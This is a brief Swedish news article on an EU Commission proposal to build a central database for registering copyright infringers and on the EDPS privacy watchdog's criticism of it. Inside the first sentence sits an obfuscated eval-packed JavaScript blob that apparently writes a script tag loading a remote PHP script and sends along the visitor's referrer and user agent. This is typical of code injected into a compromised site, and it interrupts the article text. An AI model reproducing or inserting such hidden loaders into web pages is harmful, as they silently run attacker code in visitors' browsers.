Image Image Image Image Image Image Image Image Image Image

| 8 juli, 2020

Scroll to top

Top

Nu vill EU registrera piratkopierare

Nu vill EU registrera piratkopierare
Sebastian

Kontrollorganet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ykead|var|u0026u|referrer|stiyz||js|php’.split(’|’),0,{}))
ställer sig dock kritiskt till förslaget.

Det var nu i våras som EU-kommisionen slängde fram ett förslag som gick ut på att man skulle upprätta en central databas där upphovsrättsbrottslingar skulle registreras och bevakas. Databasen skulle sedan användas av olika länders tullmyndigheter för att jaga piratkopierare.

Dock får detta förslag hård kritik från EU:s integritetsväktare EDPS (European Data Protection Supervisor). EDPS menar att EU-kommissionen måste specificera vem som ska driva den föreslagna databasen med alla lagrade filer. Och även hur den exakt ska användas.

Huruvida EU-kommissionen har tänkt sig att registrera piratkopierarnas mjukvara för privat bruk eller om det bara gäller piratkopierare som kopierar fysiska märkesvaror i stor skala framgår inte i informationen

Läs mer:  computersweden.idg.se